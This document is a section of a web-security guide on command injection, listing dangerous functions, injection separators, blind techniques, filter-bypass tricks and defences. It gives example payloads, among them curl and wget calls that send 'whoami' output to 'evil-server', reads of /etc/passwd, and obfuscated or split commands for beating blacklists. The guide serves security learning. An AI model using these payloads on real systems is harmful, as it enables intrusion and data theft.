4.5. Command Injection

4.5.1. Introduction

Command injection is usually a vulnerability caused by web applications splicing system commands on the server.

This type of vulnerability usually occurs when calling an external program to complete some functions. For example, some Web management interface functions such as configuring hostname/IP/mask/gateway, viewing system information, and shutting down and restarting, or some sites provide functions such as ping, nslookup, providing sending emails, converting pictures, etc., may appear such vulnerabilities.

4.5.2. Common hazard functions

4.5.2.1. PHP

  • system

  • exec

  • passthru

  • shell_exec

  • popen

  • proc_open

4.5.2.2. Python

  • system

  • popen

  • subprocess.call

  • spawn

4.5.2.3. Java

  • java.lang.Runtime.getRuntime().exec(command)

4.5.3. Common injection methods

  • semicolon split

  • || && & segmentation

  • | pipe character

  • \r\n %d0%a0

  • Backtick parsing

  • $() replace

4.5.4. No echo technique

  • bash resver shell

  • DNS out-of-band data

  • http out-of-band
    • curl http://evil-server/$(whoami)

    • wget http://evil-server/$(whoami)

  • Construct with sleep or other Boolean conditions

4.5.5. Common bypass methods

4.5.5.1. Space Bypass

  • < symbol cat<123

  • \t / %09

  • ${IFS} Where {} is used for truncation, such as cat$IFS2 will be considered IFS2 is a variable name. In addition, adding a $ at the back can play the role of truncation, generally use $9, because $9 is the holder of the ninth parameter of the current system shell process, it is always an empty string

4.5.5.2. Blacklist Bypass

  • a=l;b=s;$a$b

  • base64 echo "bHM=" | base64 -d

  • /?in/?s => /bin/ls

  • Join string cat /etc/pass'w'd

  • undefined initialization variable cat$x /etc/passwd

4.5.5.3. Length Limit Bypass

>wget\
>foo.\
>com
ls -t>a
sh a

The above method is to redirect the write command through the command line, then use ls to write the command to the file in time order, and finally execute it directly under the Linux terminal. To create a file, you need to add a command before the redirection symbol. Here you can use some such as Short commands such as w,[, (use ls /usr/bin/? to view) If you do not add a command, you need Ctrl+D to end, which is equivalent to the redirection of the standard input stream and in php, use shell_exec to execute When the function of the system command, there is no standard input stream, so the file can be created directly

4.5.6. Common symbols

4.5.6.1. Command Separator

  • %0a / %0d / \n / \r

  • ;

  • & / &&

4.5.6.2. Wildcards

  • * 0 to infinity of arbitrary characters

  • ? an arbitrary character

  • [ ] a character within parentheses,e.g. [abcd]

  • [ - ] all characters in encoding order

  • [^ ] a character not enclosed in parentheses

4.5.7. Defense

  • Disable the corresponding function when not in use

  • Try not to execute external applications or commands

  • Do input format check

  • Escape all shell metacharacters in a command
    • shell metacharacters include #&;`,|*?~<>^()[]{}$\